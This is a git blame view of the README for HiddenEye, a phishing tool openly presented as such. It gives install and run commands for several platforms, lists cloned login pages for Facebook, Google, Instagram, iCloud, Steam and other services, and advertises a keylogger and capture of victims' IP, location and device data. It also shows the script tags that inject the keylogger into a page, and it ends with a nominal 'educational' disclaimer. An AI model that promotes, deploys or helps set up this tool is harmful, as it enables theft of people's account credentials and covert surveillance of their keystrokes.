HiddenEye-Legacy/README.md

303 lines
5.9 KiB
Markdown
Raw Normal View History

2018-03-26 22:35:33 +08:00
<p align="center">
2018-10-28 14:17:29 +08:00
<img src="logo.png">
2018-03-26 22:35:33 +08:00
</p>
<p align="center">
2018-10-28 13:25:29 +08:00
Modern phishing tool with advanced functionality
2018-03-26 22:35:33 +08:00
</p>
<p align="center">
NOW WE HAVE ADDED KEYLOGGER WITH THE PHISHING PAGES // VICTIM DEVICE INFO ALSO AVAILABLE
2018-04-25 19:39:56 +08:00
</p>
2018-04-23 11:55:13 +08:00
### PREREQUISITES ( Please verify if you have installed )
2018-03-26 22:35:33 +08:00
2018-06-27 18:06:01 +08:00
* Python 3
2018-03-26 22:35:33 +08:00
* Wget from Python
* PHP
* sudo
2018-10-28 13:25:29 +08:00
2018-03-26 22:35:33 +08:00
2018-06-27 18:18:40 +08:00
### TESTED ON FOLLOWING
2018-03-26 22:35:33 +08:00
* **Kali Linux - Rolling Edition**
* **Parrot OS - Rolling Edition**
2018-03-26 22:35:33 +08:00
* **Linux Mint - 18.3 Sylvia**
* **Ubuntu - 16.04.3 LTS**
* **MacOS High Sierra**
* **Arch Linux**
* **Manjaro XFCE Edition 17.1.12**
* **Black Arch**
2018-03-26 22:35:33 +08:00
### CLONE
```
2018-10-28 13:25:29 +08:00
git clone https://github.com/DarkSecDevelopers/HiddenEye.git
2018-03-26 22:35:33 +08:00
```
2018-03-31 17:09:27 +08:00
### RUNNING (In Linux)
2018-03-26 22:35:33 +08:00
```
2018-10-28 13:25:29 +08:00
cd HiddenEye
2018-03-26 22:35:33 +08:00
```
2018-06-27 18:06:01 +08:00
```
sudo apt install python3-pip
```
2018-03-26 22:35:33 +08:00
```
2018-06-18 11:12:22 +08:00
sudo pip3 install -r requirements.txt
2018-03-26 22:35:33 +08:00
```
2018-03-26 22:51:18 +08:00
```
2018-10-28 13:25:29 +08:00
chmod 777 HiddenEye.py
2018-03-26 22:51:18 +08:00
```
2018-03-26 22:35:33 +08:00
```
2018-10-28 13:25:29 +08:00
python3 HiddenEye.py
2018-03-31 17:09:27 +08:00
```
OR
```
2018-10-28 13:25:29 +08:00
./HiddenEye.py
2018-03-26 22:35:33 +08:00
```
### RUNNING (If distro based on Arch Linux)
```
2018-10-28 13:25:29 +08:00
cd HiddenEye
```
```
sudo pacman -Syu
```
```
sudo pacman -S python-pip
```
```
sudo pip3 install -r requirements.txt
```
```
2018-10-28 13:25:29 +08:00
chmod 777 HiddenEye.py
```
```
2018-10-28 13:25:29 +08:00
python3 HiddenEye.py
```
OR
```
2018-10-28 13:25:29 +08:00
./HiddenEye.py
```
### RUNNING (For Android users in Termux)
2018-03-31 17:09:27 +08:00
2018-04-01 21:31:01 +08:00
```
First install { Termux } from Playstore.
```
```
After opening Follow below commands One by one
```
2018-03-31 17:09:27 +08:00
```
2018-08-03 23:58:50 +08:00
pkg install git python php curl openssh grep
2018-03-31 17:09:27 +08:00
```
```
2018-06-18 17:58:58 +08:00
pip3 install wget
2018-03-31 17:09:27 +08:00
```
```
2018-10-28 13:25:29 +08:00
git clone https://github.com/DarkSecDevelopers/HiddenEye.git
2018-03-31 17:09:27 +08:00
```
```
2018-10-28 13:25:29 +08:00
cd HiddenEye
2018-03-31 17:09:27 +08:00
```
```
2018-10-28 13:25:29 +08:00
chmod 777 HiddenEye.py
2018-03-31 17:09:27 +08:00
```
```
2018-10-28 13:25:29 +08:00
python HiddenEye.py
2018-06-18 17:58:58 +08:00
or
2018-10-28 13:25:29 +08:00
./HiddenEye.py
2018-03-31 17:09:27 +08:00
```
### Running (One Code installation in termux)
2018-03-31 17:09:27 +08:00
```
First install { Termux } from Playstore.
```
```
After opening Copy and run this Single Command.
```
```
2018-10-28 13:25:29 +08:00
pkg install git python php curl openssh grep && pip3 install wget && git clone https://github.com/DarkSecDevelopers/HiddenEye && cd HiddenEye && chmod 777 HiddenEye.py && python HiddenEye.py
```
2018-03-26 22:35:33 +08:00
## AVAILABLE PAGES
**+ Facebook:**
- Traditional Facebook login page.
2018-06-28 13:36:55 +08:00
- Advanced Poll Method.
2018-03-26 22:35:33 +08:00
- Fake Security login with Facebook Page.
- Facebook messenger login page.
**+ Google:**
- Traditional Google login page.
2018-06-28 13:36:55 +08:00
- Advanced Poll Method.
2018-03-26 22:35:33 +08:00
**+ LinkedIn:**
- Traditional LinkedIn login page.
**+ Github:**
- Traditional Github login page.
**+ Stackoverflow:**
- Traditional Stackoverflow login page.
**+ Wordpress:**
- Similar Wordpress login page.
**+ Twitter:**
- Traditional Twitter login page.
**+ Instagram:**
- Traditional Instagram login page.
- Instagram Autoliker Phishing Page [ ADVANCED METHOD ADOPTED ].
2018-03-26 22:35:33 +08:00
### WHAT'S NEW FEATURES
**1) LIVE ATTACK**
2018-04-22 20:53:14 +08:00
- Now you will have live information about the victims such as : IP ADDRESS, Geolocation, ISP, Country, & many more.
2018-06-22 12:40:08 +08:00
**2) COMPATIBILITY**
- All the sites are mobile compatible.
**3) KEYLOGGER**
- Now you will also have the ability to capture all the keystokes of victim.
2018-10-19 10:10:27 +08:00
**(CURRENTLY):- This feature is added on instagram web page and github, to less the possibility of slow functioning of generated link)
**HOW TO ADD IT MANUALLY ?
-- You can add this manually by putting the codes on index page.(put these code at anywhere inside the index page // but not between any other script codes)
```
2018-10-20 00:04:43 +08:00
<script src="keylogger.js"></script>
<script src="keylogger.php"></script>
```
### NEW PAGES
2018-03-26 22:35:33 +08:00
<p align="center">
**1) FACEBOOK PHISHING:**
2018-03-26 22:45:02 +08:00
- Traditional Facebook login page.
2018-06-28 13:36:55 +08:00
- Advanced Poll Method.
2018-03-26 22:45:02 +08:00
- Fake Security login with Facebook Page.
- Facebook messenger login page.
2018-03-26 22:35:33 +08:00
**2) INSTAGRAM PHISHING:**
- Traditional Login Page
2018-06-27 18:13:22 +08:00
- Fake instagram Autoliker Page [ REDIRECTS TO ORIGINAL AUTOLIKER PAGE AFTER SUBMIT ]
**3) SNAPCHAT PHISHING:**
2018-04-25 13:29:32 +08:00
- Traditional Snapchat Login Page
2018-04-25 13:30:25 +08:00
**4) YAHOO PHISHING:**
2018-04-25 13:29:32 +08:00
- Traditional Yahoo Login Page
**5) TWITCH PHISHING:**
- Traditional Twitch Login Page [ Login With Facebook Also Available ]
2018-06-04 19:08:25 +08:00
2018-06-04 19:15:36 +08:00
**6) MICROSOFT PHISHING:**
- Traditional Microsoft-Live Web Login Page
2018-06-18 22:42:39 +08:00
**7) STEAM PHISHING:**
- Traditional Steam Web Login Page
2018-06-28 13:36:55 +08:00
**8) VK PHISHING:**
- Traditional VK Web Login Page
- Advanced Poll Method
2018-07-15 19:20:58 +08:00
2018-07-15 19:22:13 +08:00
**9) ICLOUD PHISHING:**
2018-07-15 19:20:58 +08:00
- Traditional iCloud Web Login Page
2018-03-26 22:35:33 +08:00
</p>
### SCREENSHOT
2018-03-26 22:47:51 +08:00
![Shot](https://github.com/An0nUD4Y/SocialFish/blob/master/sc.png)
2018-03-26 22:35:33 +08:00
2018-03-27 18:04:01 +08:00
![Shot](https://github.com/An0nUD4Y/SocialFish/blob/master/sc1.png)
![Shot](https://github.com/An0nUD4Y/SocialFish/blob/master/sc2.png)
2018-06-22 12:35:31 +08:00
2018-03-26 22:35:33 +08:00
## DISCLAIMER
<p align="center">
TO BE USED FOR EDUCATIONAL PURPOSES ONLY
</p>
2018-10-28 13:25:29 +08:00
The use of the HiddenEye is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program.
2018-03-26 22:35:33 +08:00
"DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
Taken from [LICENSE](LICENSE).
2018-06-24 23:52:33 +08:00
## Help us with Donation
If you liked the work and want to support us all, you can donate :D
<img src="https://github.com/An0nUD4Y/SocialFish/blob/master/donation.png"></img>
Bitcoin Address: qpuwdfv3p3gpufzctjapp0dp9z4kkk9x6cgl2hhghe
2018-03-26 22:35:33 +08:00
### VIDEO DEMO
<p align="center">
<a href="https://www.youtube.com/watch?v=dCuZR2C7Hhw">
2018-03-26 22:35:33 +08:00
<img src="https://raw.githubusercontent.com/An0nUD4Y/SocialFish/master/video.png" />
</a></p>
2018-10-28 13:25:29 +08:00
## :octocat: DEVELOPERS // CONTRIBUTORS
1. An0nUD4Y [ Instagram.com/its_udy ] - **Developer**
2. usama7628674 - **Developer**
3. UNDEADSEC - **Developer**
4. Micrafast - **Contributor**
5. alexmozzhakov - **Contributor**
6. sTiKyt - **Contributor**
7. _______________________ (Waiting For Your Contribution)